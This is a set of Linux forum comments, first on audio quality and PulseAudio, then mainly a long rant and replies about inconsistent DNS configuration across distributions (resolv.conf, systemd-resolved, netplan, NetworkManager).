this is so educational, we need more articles like this!
I'll save this book for my summer reading.
> Buy a good external DAC, turning a digital signal into analog inside of a PC case is a bad idea due to electromagnetic interference. Ever plugged your headphones into the front audio jack of your case? You will hear the noise. A good DAC will make a meaningful improvement your listening experience.

Same problem with mics connected to the tower. You can hear the noise. You can fix it passing the noise filter in audacity, but i had troubles with all the mics i tried in real time

This work well on windows tho. Out of the box

I tried the pa filter for noise reduction, but it barely helps. Yes, i tried a few mics and using the same mic on wingows. On windows just works :/

I know its possible, because mumble is able to to reduce the noise in real time too

Why this is not default in linux, i will never understand. I remember having almost cristal clear mic quality with shitty mics since windows 98...

My other grip is multiuser sound in linux. I wanted to have a separate user just for safely playing games on my computer and my first problem was the second user accessing the pulse audio server. I was told that it was not design with this use case in mind

PS: I appreciate people that tries to help with sound on linux. Maybe im biased, but ive been using linux for ~10y now and i dont remember having this many issues with sound on windows. In windows sound was completely invisible for me
I don't think you emphasized the importance of hardware enough. Your speakers/headphones are the single largest determining factor in the sound you actually get, by multiple orders of magnitude. It really needs to be emphasized that software doesn't matter and even encoding quality only creates a "cap".

> with storage being abundant these days, you can play it safe and use 320kbps if it makes you feel better.

You could say the same about FLAC, to be honest.

> There is no reason not to use VBR at all

Untrue. If you're livestreaming, using a fixed bitrate is very valuable. Audio quality taking a hit is far preferable to dropping viewers because their pipes couldn't keep up with a bump.

> Do not set avoid-resampling to true, this is a huge misconception, this does not improve sound quality at best, and in the worst case, can actually break things.

It *can* help responsiveness and reduce/prevent stuttering in extremely CPU-limited environments (e.g. Raspberry Pi and similar SBCs) that are already very busy.

> They are exactly the same, Pulse doesn't work that different from how Windows does mixing and resampling.

That's completely dismissing out-of-hand all sorts of stupid problems caused by incomplete or buggy drivers. It's not as bad as it used to be but certain cards (looking at you, Sound Blaster Z) still don't behave and give a sub-par signal. If you don't want to or can't invest in compatible gear, yes, it's 100% possible that Windows sounds better.
Thank you for stitching Wikipedia sources together.

Now tell me why does Pulse lowers firefox (YouTube to be exact)'s playback stream?
Like 80% but it's not consistent. Sometimes it's 78, sometimes it's 89%. Heelp it bugs me to hell and there is no help on forums. I dug up the whole internet and the documentation for Pulse is missing.

And then people coma at me and ask: "Hey why do you hate pulse so much?"
Then I tell them my problem and if they could help me the they are like: 🤷sry man idk.
[deleted]
If I use youtube-dl to download audio off YouTube what is the best way to ensure that the sound is just as good? Can I just use ffmpeg or something to split out the audio stream? What settings are ideal for this?
those who use linux are not penguines
I like how every review goes "bUt YoU cAnNoT hEaR aBoVe xx FrEqUeNcY" - it's like people never actually listened to music a bit louder with good speakers.
When I started with this whole UNIX in the 90s, where KISS ruled, and almost all DNS was a line or two in resolv.conf. About ten years ago, something changed.  Part of the problem were the "improvements" of systemd, and no matter how one feels about systemv vs. systemd, that's only PART of the problem. 

For example, I had to take over a bunch of development build machines which write firmware for government hardware. Al these systems have about 5-6 different versions of Ubuntu, Debian, Fedora, and RedHat/CentOS that span the last 12 years. Some are \*forced\* to be legacy distros because the manufacturer of the build systems only work with a specific version of a distro. Don't ask me why, that's the specs I deal with. All their instructions range from some stripped down version of CentOS 4 on "see supplied VMDK" to the latest Ubuntu Focal Fossa 20.04 off Vagrant. And not one goddamn one of them has the same way to do two simple things:

1. What DNS servers am I using?
2. How do I add custom ones?

Right now I am in Ubuntu Server hell because starting with Precise Pangolin --and try saying Ubuntu names with a straight face to a board of directors, especially "On Bionic Beaver, we ran into some problems..."-- but also, just the simple act of putting in custom DNS changes.  PLUS, the desktop version is DIFFERENT than the server version, which is different than the one on docker, which is different even on AWS versions, making a lot of online howtos in places like Ubuntu Wiki and Stackexchange a minefield of nmcli, systemd-resolve --status, cloud.yml, dnsmasq, dhclient.conf, blah blah blah/head, or ../tail ... it's all different. It might work on yours, it might not? Wait, you DON'T have NetworkManager on your AWS image?  Try nmcli... no? How about  /etc/systemd/resolved.conf? In interfaces? Wait, that's a cloud thing, isn't it?  Where they keep resetting your hostname too?  Like /etc/netplan/50-cloud-init.yaml? Wait, do you HAVE netplan on here?

At some point, some clowns with a few loose ganglia tried to grow a brain and took the relatively simple "put it in resolv.conf" and suddenly had that point only to 127.0.01:53, or some localhost version thereof, which blinds the system admin forced to work with these as to what servers are actually being looked at to resolve things upstream. And then tacks on a vague warning "DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN"  but not by what, or why, or how to stop it other than "check resolveconf manpage" and... resolvconf is not installed.  You gotta figure out some fucking voodoo upstartd, resolvconf, or systemd command and grep out the work "Servers" with a capital S and hope they are right. 

Look, I don't care if ya'll, in some goddamn consortium, decide to put it in /lib/system-junk/dnsfuckery/upstart/resolve.dns.custom-except-cloud/the-princess-is-in-another-castle.yml or some other path, but SOMEBODY PICK A STANDARD and STICK WITH IT because I am sitting here on a Sunday night with my balls between my ears trying to:

1. Find out what DNS servers this system is using?
2. How do I add custom 2 private DNS servers?

It changes from distro to distro, version to version, and is even different in the SAME version in some vagrant box, AWS image, docker image, of desktop CD that came free with my Atari Enthusiast magazine.

What happened to the UNIX philosophy of "make a tool do one thing, and do it well?"  It's just a goddamn DNS server, probably still one of THE most important parts of the Internet, and everyone is kicking it around like you're all using some hamonous DHCP joining hand-to-hand in some universal love and kindness that frankly, does not exist in any enterprise I have ever worked with, and made something that used to be simple, and universal, and treats it like, "oh, what? Now you want CUSTOM DNS? What are you, some kind of lunatic?"

How did we all go so horribly awry?
I feel your pain. We got here due to a combination of things:

1. Legitimate problems with the traditional unix resolv.conf in a world of dynamic network settings. (DHCP, VPN, roaming laptops, public wifi, etc.)
2. Someone publishing a "solution" that breaks established workflows and domain knowledge, thereby creating new problems for other people.
3. Someone else repeating step 2, and then someone else, and so on, in an ongoing cycle of compounding disruption and complexity in our shared ecosystem.

We developers love making new stuff, but many either underestimate the importance of boring things like compatibility and integration, or don't have the patience required to do a good job of it. Also, employers contributing to linux often have little regard (or budget) for supporting workflows other than their own.

Unfortunately, this pattern has become increasingly common as linux has risen in popularity over the past couple decades. DNS is one of the messiest examples, but not the only one.

I manage it by disabling services like like systemd-resolved and dnsmasq unless I have a specific need for them. I've never used netplan. NetworkManager only runs on my workstations that require its features; never on servers or VMs. Most distros I've used can fall back to plain old config files like /etc/network/interfaces and /etc/resolv.conf. Of course, disabling the fancy stuff requires learning about it, so some time and hassle is still involved, but at least it's mostly a one-time cost.
Resolv.conf is in a weird place where it's simultaneously variable data but also often treated as a config file even when it really technically isn't. It's been generated dynamically long before systemd/etc since it has to be over DHCP. Plus it doesn't scale well to having VPN's or multiple interfaces requiring separate DNS servers (i.e. LAN environments where DNS may be split by subnet). So you get this weird mess where DNS resolution needs to be managed dynamically but in a way that looks static.

The classic Linux problem of course is the above is a valid problem with multiple different solutions, so naturally each distro *has* to pick it's own solution /s.

resolv.conf also falls in the not-understanding-FHS trap like putting your websites in /var/www where people have been thinking the wrong way for so long when distros start going the "right" thing it seems stupid.

EDIT: Probably shouldn't have said "trap" in my last line, but since people are asking, you should [place server content in /srv](https://tldp.org/LDP/Linux-Filesystem-Hierarchy/html/srv.html) not /var/www . There's a [StackExchange answer that explains things much better then me](https://unix.stackexchange.com/questions/47436/why-is-the-root-directory-on-a-web-server-put-by-default-in-var-www) by the TLDR is /var/www is where the distro sets the default apache config files to point to. They need a spot they can manage (/srv is explicitly managed by the sysadmin) so they can provide you with a working sample Apache setup, so they picked /var/www. You are intended to change that to a /srv location, though obviously it doesn't make too much of a pragmatic difference.
The Ubuntu names are codenames. When addressing non-technical folk just refer to the *version number*. We use Debian here and when talking to management, I never say things like "We are upgrading this system from buster to bullseye", we tell them "We are upgrading from Debian 10 to 11". To someone who doesn't administer Debian, using the version numbers makes sense. Just use the version numbers, not the code names.
I just had to add a custom dns for Linux mint.

For the life of me, I couldn't figure out if Network Manager was using systemd-resolved to manage dns or not.

I decided to take the big hammer approach, and edited all relavent files (to systemd-resolved) and Network Manager, and it worked.

I have no idea which file did it, or on which reboot it worked, but it's worked
[deleted]
I feel your pain... mostly because I've been through a similar path. On my mix I don't have old machines like that, instead I have:

* Raspberry PIs (Raspbian)
* Embedded Linux devices running OpenWRT, or Petalinux (Yocto)
* Wait, and that is not all: Mac OS!!!! 

... and I am waiting for the next genius that propose yet-another-way to configure the DNS...

You know what? Probably 10 years from now, we'll all be back to `/etc/resolv.conf`  sigh!
> try saying Ubuntu names with a straight face to a board of directors

While I sympathize with your post and realize that this isn't directly relevant, I thought that 5 days before the Jammy Jellyfish release I'd comment on this.

You're not *supposed* to say the development codenames for Ubuntu releases to a board of directors.  They're fun names for developers.

The upcoming release of Ubuntu is officially called `Ubuntu 22.04 LTS`, and even if devs are using the codename, they usually just say `jammy`.

The codenames are fun for wallpaper mascots, but the final name is professional and informative (since the version number is year.month).
[deleted]
is there a reliable way to find out which process last modified a file?

really useful for finding out what kind of fuckery creates a literal \\~ folder in my home FOR SOME GODDAMN REASON GODDAMMIT KDE
I've set DNS in /etc/resolv.conf and chattr +i'd it more than once. Am I a bad person ?
Dude I feel your pain. Not with DNS, but network configuration in general. Pretty much all I ever want or need to do aside from the default is

- configure some static IP addresses
- tweak some DHCP settings

That’s it. I only got started on Linux systems like a decade ago, at which point most tutorials and guides still mostly pointed you to `/etc/network/interfaces` and whatever `dhclient`’s config file is. That worked without issue for me for years, and the last 3-4 years I feel like every new system I interact has managed to invent yet another way to manage network interfaces and DHCP. And of course it does things differently and doesn’t respect any of the other usual configuration paths.

But now I feel like half the battle is figuring out what the fuck is even managing my network stack. Here’s my current process for setting a static IP:

1. Try the classics: using the `interfaces` file and `ifup`/`ifdown` (or `ip l set dev down/up`).
2. Are my settings ignored by some shitty daemon?
3. Is it systemd-networkd? No?
4. Maybe it’s NetworkManager? Still no.
5. How about connman? (Side Note: i loathe connman with every fiber of my being. It’s documentation is terrible and dense, even the arch wiki page is unhelpful when all I want to do is *set a static IP on eth0*. Why is it so painful to use?) 
6. At this point I usually give up, throw something, and step away from the computer for a bit.

Similarly for trying to do some DHCP configuration (or even just see what my current leases are)

1. Check the usual places for `dhclient`
2. Apparently those aren’t present. Maybe it’s systemd-networkd running the show?
3. Nope. Dnsmasq?
4. Nope. NetworkManager?
5. Nope. Connman?
6. Still nope. I give up and drink myself stupid.
KISS and FOSS are sometimes in conflict because while you could technically achieve a really simple config for every distro, every user has a different need (specially considering enterprise use), and since it's FOSS, anyone can edit it to suit their needs. Eventually some choices end up being more used than others but that also leaves room for fragmentation.
I've been using Linux professionally since the mid-90s and really don't like the direction things have gone.  OP describes just one symptom of the problem. The goals of simplicity and consistency have been abandoned. My biggest problem is that all the other options available are worse in one way or another.
Now that was a righteous rant!! Totally feel your pain.

We need a nice sleuthing script that will scan your system, run some tests, and report back the DNS and Network configuration currently in use. Any volunteers? Hahahaaaa aaaah  (that was a crazy laugh)
> About ten years ago, something changed.

It's called "people started caring about using Linux for something other then datacenter server OS" 

Having two DNS entries put into /etc/resolv.conf only works if you want to have 100% of the DNS configuration done on the DNS server and you trust your DNS server explicitly. 

If you want to be able to validate DNS responses, use VPN connections with private IP addresses with DNS names, connect to public access points,  or essentially use anything more complicated then a single statically configured Ethernet port for life... then putting IP addresses in /etc/resolv.conf isn't going to cut it.

You need to have a local resolver service to provide those features in a sane manner.
OP, I love this rant and couldn't agree more.

I will start a similar rant regarding the Linux sound subsystem some day.
Oh man I feel this in my bones. I don't even manage that many Linux boxes but it's a nightmare any time we get close to these issues.
I feel this so much. I regularly struggle with netplan, resolvconf and whatnot just trying to get back to the old and trusted ifupdown config of just putting it all under one interface and be done with it.

I get it, netplan offers some new stuff ifupdown cannot do, but when do you really need that over just a working connection in general. Configuring an IP, gateway, netmask and some DNS should be four or five lines of config, it doesn't need more to establish a connection in most machines. In places more fancy stuff is needed chances are you are not even touching configs on machines anyway and just deploy with ansible or whatever new fancy system does that these days.

I'm an ubuntu person, because it offers the best coverage of software I need, but dealing with netplan each time I just wanna get a VM online to test some software with, having to install ifupdown, nuking netplan off there cause of course it doesn't just cleanly uninstall everything and then finally having to figure out what in the fresh hell resolvconf just did to itself takes way more time than it should.

I am really tempted to just make myself a netplan-to-if script that does this or even repackaging my ubuntu images with ifupdown from the start, because it not only takes time after install, but even at the installer itself. When I need to configure static I have to remember the gateway, IP and netmask I need for the network and then netplan wants me to do math to convert that to a CIDR as if I wanted to do even more math. Yes it is a normal skill to have... for a network engineer, but I do software dev and testing, I got enough math to remember as is. What exactly was so wrong with 255.255.1.1 etc?

The fact that this stuff offers all sorts of fancy new stuff coming at the expense of usability and simplicity is maddening. Maybe I am all alone in this today, but I grew used to KISS and simplicity with options rather than options without simplicity. The standard configurations out the box with a handful of options should "just work" and whatever else you need to do you are in charge of your own destiny, but don't force concepts on me that I don't need for what I want to do, keep them for when I want to build something exotic.

When it comes to networking the industry is probably partly to blame for this. When I see the amount of paper and certs you have to slog through to get a job in networking field only to then spend the day cabling routers up and configuring yet another vlan barely using 10% of what you had to learn. In IT we are moving more and more towards a credential-based evaluation of people, people = numbers, rather than figuring out what is being worked on day to day and finding people familiar with that. No we have to know everything only to then do a fraction of it which is not at all resource effective. Not to mention what it does to people and the work environments. I am preaching to the choir here and most of you know that feeling all too well.

Why has it become this way? Do we just make things more complex to solve issues or because we want modularity above all else come what may? It's almost as if we invent problems and solutions that both already existed or do we really need to re-invent everything?

Heck whatever http/3 is supposed to solve and probably will break in return.
OMG I thought I was the only one who had problems with this.  I've been doing UNIX since the '90s too.  What the hell is wrong with simply entering DNS servers in resolv.conf?  It was that way for YEARS.  The new way is not always the best way.
You just nailed my experience with Linux in the last 20 years. The entire fragmentation everywhere is just ridiculous.

Imagine you’re learning Linux, and need to change dns. You’re on Ubuntu 20.04 because “it is popular” and “it must be easy right?”. You’re doing this at work so you don’t have a GUI but only SSH access to a VM. Let’s Google: https://www.google.com/search?q=change+dns+ubuntu+20.04&ie=UTF-8&oe=UTF-8&hl=en-us&client=safari. Ok first post is out because you’re on the CLI. The next post I see is https://askubuntu.com/questions/1280277/how-to-change-dns-server-permanently-on-ubuntu-20-04 where there are like 3 different answers. So which one is the RIGHT one? But we are Googling it right?  

This is the experience we have today. It is moronic, not good UX, and is one of the reasons Linux has not taken off in the desktop space yet.
It's not just DNS. It's all of networking in Linux is a fucking mess. I don't know why there's no simple app in Linux to tell you everything that `ipconfig /all` tells you in Windows in a nicely laid out, easily readable format. `ip a` is a nearly unreadable mess with only half the information and then you need `route` to tell you what your default gateway is, and that's not exactly easily readable either. It's all just a stupid, convoluted shitshow.
Normally I'm on the other side but for once I'm inclined to agree with most of this post.

It is a mess. It's hard to find out where I'm supposed to make changes. I can't find accurate documentation on a per-distro basis. I still have no idea what my Mint desktop or Ubuntu server are doing with DNS.
I absolutely love "old man yells at cloud" style rants like these. Fantastic.
Bravo. I've been saying that for years. So many people have looked at me sideways and said "it's right here...". Sure, for the version you use day in and day out for years. But not all of them are like that. 

I partly blame 'ifconfig' and 'ip a'. DNS should be listed there. So many other things are, but not DNS.
1) dnsfuckery will be used as an appropriate problem description from here on out.

2) I can't agree with you more. It seems like alot of solutions to desktop problems end up on servers. Servers are not that dynamic at that level. We've strayed so far from the KISS thought process and more towards a windows "this is better and you don't need to know how it works" philosophy. IMO the only thing worse are those who defend it.  This will be the downfall of linux (or gnu linux if you're anal retentive).
Ran into this recently. I don't know what to tell you. Don't look at the source code of these apps, they are full of holes.

For instance, netplan passes variables to command line without escaping them.
and here i am just a taxpaying,  non-sysadmin, run of the mill citizen who still doesn't know how to persistently change the DNS addresses on my debian testing installation. 

gave up and i just changed the DNS addresses on my home router.
THANK YOU. 
I had to deal with this bullsh!t on SUSE, where both NetworkManager and `netconfig` will fiddle with the DNS settings. NM automatically setting shitty defaults every single time, it took ages to ping websites. There are at least 3 programs overwriting the same file. Configuring it isn't straightforward either...for a *single* distro. 

F*cking Windows allows you to change DNS settings more easily.
>/lib/system-junk/dnsfuckery/upstart/resolve.dns.custom-except-cloud/the-princess-is-in-another-castle.yml

Made me chuckle.
can i upvote this more than once?
Incrementally. OpenBSD's ifconfig, dhcpleased, resolvd and unwind make iproute2, Network Manager and systemd-resolved look like a pile of Pollocks that've been set on fire. They illustrate nicely why one ought to think about the problem *before* developing a solution.
CentOS 4 is from 2005. I don't think the Linux ecosystem would be better if we optimized it towards your use case of deploying the same configuration on software released 17 years ago.

Managing that complexity is literally your job.
This is why i moved to FreeBSD recently.
systemd nails everything on your system. its system demon not system daemon.
I've found gentoo a bit simpler, without the systemd stuff in the way (at least by default!) https://wiki.gentoo.org/wiki/Resolv.conf
Just put whatever DNS servers in /etc/resolv.conf and make the file immutable 😉
Everybody is making one tool. Nothing says they shouldn't all be making the same, one tool

apparently...
Wait.  

_Where_ are your balls?
Ironically when KISS died, is when distros started to drive you wild, drive you craaazyyyyyyy /s

Honestly though, this is why I pretty much have stuck with Arch and its forks for so long. KISS tools for a KISS distro, works when you want it to and when it doesn’t, as long as you know what you’re doing, everything’s an easy fix. I run some Debian servers for stability but I’m even considering just making these arch at this point because I’ve had way more problems running those in the past couple of months than I’ve had in the entire time I’ve used arch.
This all worked before systemd.
people tell me all this was done because of dynamic needs, but that's no reason to screw with servers

I have often found myself setting /etc/resolv.conf to what I need then `chattr +i` it.  If I don't have any containers I'll also fix the hosts line in nsswitch.conf to have only "files" and "dns"

downvotes welcome
You don't have to say the fun name of ubuntu distribution to shareholders, instead of "bionic beaver" says "the april 2018 version that we can't upgrade because of ..."
>And then tacks on a vague warning "DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN" but not by what, or why, or how to stop it other than "check resolveconf manpage" and... resolvconf is not installed. 

This might be a stupid question, but what exactly is stopping you from changing the file, waiting until it is overwritten and checking what did it? Or better yet, the good ole chmod 444?
Embrace modernity or something
This needs to be an IETF RFC
https://wiki.archlinux.org/title/Systemd-resolved

I actually like how systemd-resolved works.
My approach was "fuck DNS" and I wrote a script to sync `/etc/hosts` for any Linux box with SSH open on `192.168.x.x` 😂

Is it a good solution? No.

Is it a replacement for DNS? No.

Does it do what I need it to do? Yup.
I see where you are coming from, but you are running a car park, with all different brands and models from different years and then complain about the parts not being fully compatible.

Yes, KISS is the philosophy, but a lot has changed in 12 (CentOS 4 initial release is from 2005, if using a custom version it is fair to presume it's not the latest, so maybe up to 17) years. Just using resolv.conf just doesn't meet various modern day use-cases anymore.
Telnet was also a lot simpler to use than SSH, but I sure don't hope you still have that running because SSH with different algorithms and cipher support makes it more complex.

So even though I understand the frustration, the solution is to cut down on diversity, we are not Human Resources. Start by at least updating to supported Distro versions, just for the sake of your security already as I hear several versions for which no security updates are being released anymore. Backporting all security patches also doesn't make things more KISS.
If vendors don't want to do so for parts you don't have full control over, it's time to find a replacement.

Then when possible, bring it back to one Distro. That will also make it simpler(KISS) to keep control over security updates being released.

About talking to directors about Ubuntu versions, just use the numeric versions instead of code names. We also don't refer to Jack as Cross-eyed when talking to my directors.

Of course this will be an effort, but you got to pick your battles. Or the battles will come to you, like in this case.
this is one of the disadvantages on linux platforms  
no consistency 

been in that place . I can feel you. Many of us here can feel your pain
You sir have written a novel documenting your adventures. I can also document the story essence, but with a picture.

https://imgs.xkcd.com/comics/standards_2x.png
> How did we all go so horribly awry?

that's called the bazaar of development instead of the cathedral. everyone tries things out. i have to deal sometimes with similar stuff and tbh you just sound whiny.
This is literally the only field within Linux that I refuse to even try to learn. It's fucking ridiculous
Man, I love this rant. I went through this same shit going through DNS change for setting up NextDNS on Ubuntu 21.10 desktop.
I feel this so hard. I work with Cumulus Linux and we also have VRFs to contend with there which are sort of like network namespaces... Which makes DNS even more fun to manage due to the fact you need to control DNS queries across the different VRFs too.
I feel you.

> How did we all go so horribly awry?

I believe this is started with the NetworkManager, the resolvconf.conf file. The systemd one only follow what most already use and extending it to support DNSSec and any other options that 99% users never use.

> blinds the system admin forced to work with these as to what servers are actually being looked at to resolve things upstream.

sudo ss -lntp?

In sane GNU/Linux distro, resolv.conf is still the default. Because its read by glib, and any other application that use glibc, as part of the API gethostbyname and their siblings.

My issue on most distro is not the DNS but on how to manage the networks. Thanks god I have never an issue in the cloud

In my home environment, I run my local DNS cache (rescached), set my resolv.conf 127.0.0.1:53 and disable systemd resolver; I never touch the resolv.conf again. In fact I chattr +i my resolv.conf to prevent any unknown changes.
> Some are *forced* to be legacy distros because the manufacturer of the build systems only work with a specific version of a distro.

Sometimes, when I have free time, I change distros of some build systems without telling the manufacturer, and it works :P (not always) (Works better if you know where all the data is of course).
This is less significant, but I've had the same issues with WSL and Cisco's VPN client in the past
The solution I use is to apply `chattr +i` to `/etc/resolv.conf` after manually changing it. All the other programs don't change it after that. I can always `chattr -i` the resolv conf if I want to change it.
chattr +i /etc/resolv.conf
Things started to go wrong when text streams revealed themselves not to be the universal interfaces we thought they were.  Things then continued to go more wrong when we realized that stringing together simple tools that do one thing well frequently had performance issues that could not adapt to today's workloads.  Finally, when we had multiple DNS implementations, distributors realized that their choice of DNS implementation could effectively produce a lock-in effect, even though they were distributing open source software.
I always thought other people knew what was up.
\> On Bionic Beaver, we ran into some problems..."

Why would you say this instead of '10.04' or whatever?
resolvconf is an example of one of my least favorite patterns. The config file.

All the new stuff uses config directories. Packages can add their stuff in their own file, and there is no conflict.  Plus there's no unexpected crap with atomic renames if you symlink the whole dir.

Monolithic files for anything that another package might touch is nasty.


I'm pretty happy with how stuff is done now, for common use cases. Avahi and DHCP work, and I don't have to think about it.  It's designed to not need customization instead of to be customized.  It just runs into problems if you have to dig deeper because resolvconf is a pretty ugly system.
I just put my DNS to /etc/resolv.conf and haven't had a problem since.
I share your motion. To be precise the shit hit the fan with the wireless revolution and the widespread use of DHCP on the technical side and morons in management who could not understand why "not all DNS could be that simple". Certainly they also did not understand reverse DNS, anything about zones, the fact that a server is not a big iPhone or the simple principle that all that DNS and DHCP leases have to come from somewhere. But DNS is scrary (hackers use it!) and DHCP is like electricity - it just comes out of the socket...  
So there was the end of resolve.conf and the arrival of resolveconf that would override resolve.conf unless to told it not to. Which at least was possible and once done would leave you in peace for some years. Set up one DHCP server per subnet, make sure it either had forwarding DNS or told clients where to find a nameserver, done.
But progress means change and if you want to make yourself a name you have to break things. This gave us a permanently metastazing init replacement breaking things in the name of it's creator and a crowd of blind followers.
If I was compiling a Linux haters handbook, I would include this. Well done good sir.
After your anger subsides, you can maybe think about how there is no product manager for Linux. Just a loose bunch of people solving their own problems and somehow it all works together to varying degrees. For this instance, DNS client config, it might help to know how it works and why it became what it became. The gist of it is that doing DNS resolution and caching in each client application is becoming increasingly inadequate in today's network topologies, so the system needs a central resolver where routing can happen for split DNS, caching takes place and DNSSEC validation can happen. Yes that makes resolv.conf largely irrelevant in favour of whatever resolver is doing the real work. Yes all of that may not apply to your current setup. 

https://tailscale.com/blog/sisyphean-dns-client-linux/
Actually, its mostly just Ubuntu thats fucked up...
This is what happens when some people decide DNS needs to be difficult. To me, basic parameters should be as simple as possible.

Let's add a bunch of complexity to the most basic networking things. Why does a basic server need to run a stupid redirect resolver? 

The main feature that should have been added to the old school /etc/resolv.conf is doing round-robin dns on the entries.
"Its freedom, so that means I get to apply my schizophrenia to this!"

Wildly mixed distro environments were never on the radar, Linux leeway allowed for custom changes. You have ran into the exact scenario where deviations away from UNIX philosophy, compile!

Fix any spelling mistake, include your CLI example and any other examples, and target this at The Powers That Be and a few other places. Its well done.

**MAKE LINUX UNIXY AGAIN**
Personally, I like the dns set by upstream, it makes it's way easier to update tons of servers at once and also works well for out of the box at home use too. Though setting manual dns entries with nmcli isn't too bad, plus all the other wierd stuff you can do with nmcli (trunk interfaces, l2 bridges, lacp bond, failover bonds, specific vlan interfaces, and other stuff I am sure I just haven't need to use yet, but exist).

The vegistular /etc/resolve.conf does feel very odd, but stuff like coredns have things that can point to it making it a compatibility layer kinda, but you are right an actual working group to try and make dns better on linux and more cordinated sounds great (like the freedesktop project, the linux foundation, the Khronos group, etc do for many other projects).

Personally the only thing I feel lacking is DoH support, I can figure out DoTLS but not how to do system wide DoH.
You check resolv.conf and it tells you exactly where the settings are managed.
Because DNS are part of the network configuration. You might find it convenient to edit resolv.conf files, but a lot of users don't bother and they want it autoconfigured, including me.

And it works almost all the time! With the only time that it doesn't work is if the network admin screwed up their configuration.


>At some point, some clowns with a few loose ganglia tried to grow a brain and took the relatively simple "put it in resolv.conf" and suddenly had that point only to 127.0.01:53, or some localhost version thereof, which blinds the system admin forced to work with these as to what servers are actually being looked at to resolve things upstream

I mean you know that this is just wrong because a bit above you already used the right command to figure this out, it's systemd-resolved --status

All of these changes have good reasons, but i doubt that you care about reasons because you just like to do it the old fashioned way.
I have no answers for you, having descended into this same pit of hell more than once, but I did chortle out loud at your precise pangoblin comment. I \*\*\*\*ing hate those stupid names. I only ever refer to Ubuntu 16.04, 18.04, 20.04 and so on.  I want to rip those names out of the tonsils of the nitwit who thought that was such a ducky idea.
systemd-resolved works fine, and helps with getting dnssec working without issue.
I really don't get the fuzz.
I dig this.

Ever try setting up a router box with multiple NICs on fedora with systemd-resolved or whatever they call it?  It's fucking horrendous.  

Definitely miss the days of going into /etc/interfaces and just going ip static....
Isn't this something Ansible is good at?
I really need to switch back to FreeBSD, and dealing with stuff like this is a constant reminder.  I switched to Linux when something about the way the then new 64-bit kernel worked made it difficult to get 3D accelerators working in FreeBSD.  That's been long resolved, but now I'm dealing with a computer that might not wake up if it goes to sleep, an 30-second pause after starting to suspend, and crashes when playing full-screen video.  The popular Linux distros seem to be getting continuously less stable.
for me it's as simple as opening connman-gtk, going to the wifi network settings and then clicking on "nameservers"
I totally agree with this.   I really do think lot of distros try too hard at making things more complicated than it should be.  SystemD sure does not help either.   What I hate is when resolv.conf gets overwritten by some other process.   Or any other config file for that matter. When trying to google how to do something it will tell you to edit a certain file and either that file has a note saying it is automatically generated and to not edit it or it's not there in first place because the distro decided to move everything... I hate that with a passion.  I wish they would keep things more standardized and follow a KISS approach.
> At some point, some clowns with a few loose ganglia tried to grow a brain and took the relatively simple "put it in resolv.conf" 

resolv.conf might be good enough for a server sitting in a data center with completely static network configuration, but it's not good enough for desktops. This is pretty obvious if you stop to think about it (VPNs exist, mDNS exists) so honestly I don't think you attempted to do any research to figure out why higher-level tools exist. If you think /etc/resolv.conf is a usable DNS configuration interface, you are wrong. A linear list of DNS servers to try, where everything after the first three are just ignored, is not good enough. Things that are broken if you're using /etc/resolv.conf, but work fine if you're using NetworkManager plus systemd-resolved:

 * Connect to a VPN, and also print a document using your local network printer, or do anything with any local anything
 * Connect to two VPNs at once, one for privacy and one for work, routing work stuff to the work VPN and everything else to the privacy VPN

As for configuration format, I would say systemd-resolved is the "native" DNS configuration interface for Linux nowadays, with NetworkManager sitting on top of that. Most users and sysadmins only need to learn to interact with NetworkManager, which is pretty standard and handles configuring systemd-resolved for you. If you are using something different like netplan or wicked, or using dnsmasq instead of systemd-resolved, then of course you have a little more learning to do.
> What happened to the UNIX philosophy of "make a tool do one thing, and do it well?"

This simply isn't Linux anymore. GNU means "GNU's not unix" for a reason. It's true that systemd is a prime example of this, but the unix philosophy was tossed out of the broader Linux space way before systemd took over.

This might not help with your inherited systems but, there is good news: BSD is still adhering to this philosophy and resolv.conf hasn't changed there in forever. For most use cases, it's more or less the same as Linux, but less complicated.
Yes I hate that. At some point I'd befriend an ext\* filesystem and the immutable flag.
I've been around long enough to know this problem didn't exist before systemd came around and caused it. Tweens will downvote because you say something bad about something they are emotionally invested in, but it's true.
systemd is basically an implementation of the Windows registry paradigm in Linux. Centralized config and control for everything. Fine idea, in theory, not so much in practice…
You made me laugh about saying names 🤣😂
I wanted some simple IPC/shell-script glue on debian, so i put files in /run, it worked until it didn't.  Luckily my first instinct when something is wrong, is to check if its systemd.  It deletes /run/* files.  Why?  To fuck with you.  Lesson learnt, use a distribution with as few cogs and unknowns as possible.
I don’t suppose you mind it if your VPN app randomly crashes and now you’re stuck without a working DNS server or if that script you decided to run from your buddy that wasn’t generalized suddenly overwrites your detailed DNS config
Systemd is a cancer. systemd-resolve is just the most malignant tumour.

It just baffles me that developers who obviously don't give a shit about name resolution should bother to write a half-arsed, unsupported, dogs dinner resolver implementation, when numerous perfectly functional alternatives have been running for decades.

It really is the poster child of systemd's "not invented here" philosophy.
Word
Sounds to me like someone doesn't know how to RTFM.
ah good ol' [927](https://xkcd.com/927/)
This is why I stick to Arch. It's the only distro I've found that sticks to the KISS philosophy.

I've definitely tried messing around with networking settings in different other distros and experienced some of the frustrations you're having.
A few years back, I was looking into getting systemd-networkd & systemd-resolvd running and I found a post pointing at 2 issues with DNS and the usual way it's done (the author was pointing at systemd-resolvd fixing those):

*  when a VPN drop, you can't be sure which DNS is used, making it effectively possible to simply screw yourself during the time the VPN isn't back on (which can simply not show in UIs)  
* secondly there was (is?) a bug on when you have too many DNS and IIRC DNS resolution simply skip over the DNS once you reach some number.

Tho the situation is messy. One of the best thing I found with running some OpenSUSE servers is wickd. Dunno, maybe I'm just a dumb techie liking a dumb wickd and there is better way, but fuck editing resolv.conf when you can't be sure who resolve really your request.
It’s the grand plan of Big Green to reduce the carbon footprint of each individual bombarding public resolvers with tons or rqs.
Just cache the fuck out of it and reap a more green future.
Well, ask me about all the reasons I insist to use FreeBSD as a server OS
And still now and then we have Linux users post how Windows is messy..

All the freedom Linux gives also translates to lack of standards, where the most popular distro can push for its own flavor on how to do things, affecting the whole community.
I had a dabble in setting up DNS for my home network. Fuck that. I ended up buying qop.pm and making noisy.qop.pm, rush.qop.pm, splendid.qop.pm... etc, with the IPs on my network.
      services.dnscrypt-proxy2 = {
        enable = true;
        settings = {
          ipv6_servers = false;
          require_dnssec = true;
          # Servers from the "public-resolvers" source can
          # be viewed here: https://dnscrypt.info/public-servers
          server_names = [ "cloudflare" "plan9-ns2" ];
        };
      };
